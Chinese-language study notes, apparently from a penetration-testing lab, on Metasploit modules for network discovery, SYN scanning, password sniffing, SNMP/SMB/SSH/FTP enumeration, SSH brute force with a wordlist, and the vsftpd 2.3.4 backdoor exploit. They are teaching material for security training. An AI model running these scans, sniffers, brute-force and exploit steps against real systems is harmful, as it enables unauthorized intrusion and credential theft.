基于tcp协议收集

1.利用tcp做信息收集
use auxiliary/scanner/discovery/arp_sweep
设置相关属性 rhosts：目标ip therads：线程数

2.半连接方式扫描停tcp接口
use auxiliary/scanner/portscan/syn
设置相关属性 rhosts therads

3.执行密码嗅探
search psnuffle
use auxiliary/sniffer/psnuffle

基于snmp协议收集
需要开启靶机的snmp才可以查询到，方法见文档
use auxiliary/scanner/snmp/snmp_enum

基于smb协议收集信息

扫描目标版本号
use auxiliary/scanner/smb/smb_version
设置rhosts目标ip 多个目标之间用逗号加空格隔开

如果要查看目标主机的共享文件的信息 需要提前打开目标主机的共享文件功能 文件 共享 设置

枚举目标主机共享的内容
use auxiliary/scanner/smb/smb_enumshares
show options

扫描系统用户信息 SID枚举
use auxiliary/scanner/smb/smb_lookupsid
show options

基于ssh协议收集信息

查看ssh服务的版本信息
use auxiliary/scanner/ssh/ssh_version
show options

对ssh暴力破解
use auxiliary/scanner/ssh/ssh_login
设置目标ip 设置字典路径 set USERPASS_FILE /usr/share/metasploitframework/data/wordlists/root_userpass.txt

基于FTP协议收集信息

加载ftp服务版本扫描模块
use auxiliary/scanner/ftp/ftp_version

拿到ftp版本号以后查询对应的攻击模块
search 2.3.4 寻找带ftp的攻击模块
use exploit/unix/ftp/vsftpd_234_backdoor
设置目标 run